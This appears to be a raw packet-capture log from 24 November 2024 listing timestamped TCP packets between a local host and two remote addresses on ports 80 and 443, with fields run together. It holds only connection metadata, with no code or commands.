                                                                                                                                                                                              Nov 24, 2024 13:39:28.603797913 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.603918076 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.604762077 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.604805946 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.604854107 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.605741024 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.605791092 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.605809927 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.606734991 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.606789112 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.606832981 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.607724905 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.607779026 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.607825994 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.608721972 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.608771086 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.608850002 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.609743118 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.609827995 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.609834909 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.610738993 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.610838890 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.610866070 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.611717939 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.611784935 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.611864090 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.612679005 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.612798929 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.612848043 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.613743067 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.613828897 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.613886118 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.614701986 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.614753962 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.614937067 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.615678072 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.615744114 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.615746975 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.616790056 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.616832972 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.616863966 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.617666960 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.617717981 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.617758036 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.618621111 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.618669033 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.618835926 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.619611025 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.619657040 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.619687080 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.620635986 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.620682955 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.620731115 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.621596098 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.621712923 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.621757030 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.622596979 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.622728109 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.622772932 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.623606920 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.623651981 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.623703957 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.624593019 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.624686003 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.624696970 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.625579119 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.625710011 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.625727892 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.626645088 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.626677036 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.626694918 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.627588034 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.627630949 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.627676010 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.628659964 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.628726006 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.628788948 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.629545927 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.629700899 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.629745960 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.630573988 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.630651951 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.630695105 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.631536007 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.631578922 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.631650925 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.632571936 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.632586956 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.632612944 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.633574009 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.633656025 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.633657932 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.634490967 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.634533882 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.634603977 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.635493040 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.635540962 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.635586977 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.636514902 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.636557102 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.636610031 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.637571096 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.637605906 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.637625933 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.638494015 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.638551950 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.638644934 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.639499903 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.639544964 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.639585972 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.640456915 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.640521049 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.640564919 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.641465902 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.641521931 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.641593933 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.642496109 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.642555952 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.642636061 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.643446922 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.643510103 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.643579006 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.644463062 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.644509077 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.644606113 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.645487070 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.645531893 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.645626068 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.646517992 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.646630049 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.646641016 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.647387981 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.647454023 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.647500038 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.647562981 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.648401976 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.648535013 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.648580074 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.649403095 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.649529934 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.649576902 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.650566101 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.650614023 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.650620937 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.656645060 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.753102064 CET4434975313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.753253937 CET4434975313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.753407001 CET49753443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:28.753456116 CET49753443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:28.753456116 CET49753443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:28.753489971 CET4434975313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.753503084 CET4434975313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.756479025 CET49758443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:28.756521940 CET4434975813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.756603956 CET49758443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:28.756746054 CET49758443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:28.756762028 CET4434975813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.774729013 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.774760008 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.774926901 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.774951935 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.775141954 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.775188923 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.775226116 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.776103020 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.776184082 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.776226997 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.777046919 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.777759075 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.788621902 CET4434975713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.789051056 CET49757443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:28.789108992 CET4434975713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.789544106 CET49757443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:28.789558887 CET4434975713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.821722984 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.821836948 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.822010040 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.822112083 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.822220087 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.823002100 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.823048115 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.823079109 CET4434975513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.823180914 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.823230982 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.823260069 CET4434975513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.823307991 CET49755443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:28.823406935 CET49755443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:28.823421955 CET4434975513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.823432922 CET49755443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:28.823440075 CET4434975513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.823995113 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.824121952 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.824203014 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.824975967 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.825093985 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.825598001 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.826041937 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.826170921 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.826327085 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.826397896 CET49759443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:28.826495886 CET4434975913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.826577902 CET49759443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:28.826731920 CET49759443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:28.826760054 CET4434975913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.826977968 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.827114105 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.827156067 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.828141928 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.828337908 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.828385115 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.829508066 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.829600096 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.829674006 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.830388069 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.830493927 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.830532074 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.831223011 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.831357002 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.831403971 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.832134962 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.832235098 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.832283020 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.832945108 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.833101034 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.833146095 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.834187984 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.834372044 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.834418058 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.835287094 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.835422039 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.835464954 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.836507082 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.836775064 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.836838961 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.837604046 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.837757111 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.837798119 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.838567972 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.838685036 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.838732004 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.839505911 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.839607954 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.839648962 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.840243101 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.840341091 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.840378046 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.841070890 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.841228962 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.841275930 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.841995955 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.842119932 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.842164993 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.843014956 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.843141079 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.843182087 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.843918085 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.844032049 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.844072104 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.844841957 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.844989061 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.845235109 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.845859051 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.846002102 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.846039057 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.846910954 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.847065926 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.847110033 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.847906113 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.848056078 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.848098040 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.848824978 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.848952055 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.849004030 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.849781036 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.849975109 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.850020885 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.850984097 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.851449013 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.851579905 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.852117062 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.852202892 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.852247953 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.853037119 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.853229046 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.853272915 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.854171991 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.854325056 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.854372025 CET4975280192.168.2.6185.215.113.16
